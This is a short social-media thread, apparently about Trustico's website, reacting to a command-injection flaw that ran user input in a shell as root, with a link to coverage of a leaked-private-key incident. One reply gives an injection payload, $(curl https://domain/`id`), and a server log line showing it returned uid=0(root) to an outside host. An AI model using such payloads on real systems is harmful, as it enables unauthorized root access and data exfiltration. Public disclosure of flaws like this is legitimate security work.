@MrTrustico you might want to look at this
-
Wait. is that doing arbitrary shell command execution?
-
Yup.
-
Holy shit. Are they running something like `curl {$user_input}` or something crazy?!
-
more like "/bin/whatever %USER_INPUT%" which ends up being /bin/whatever $(curl ...) ;)
-
Mental. Out of curiosity, what's the extent of the access this gives? Is it crazy root access, or at least locked down somewhat?
-
it's root lmao
-
This is extremely funny, but also bad
-
Wait.. are you serious? They are passing input unfiltered to the shell, and executing it? After the 23K priv keys, I guess I'm not too surprised, but..just..wow.
#security
-
*as root
-
$(curl https://domain/`id`)
35.190.140.214 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"
:D
-
Apparently the CEO made a huge mistake: https://arstechnica.com/information-technology/2018/03/23000-https-certificates-axed-after-ceo-e-mails-private-keys/ …

Anyone got an idea what's wrong?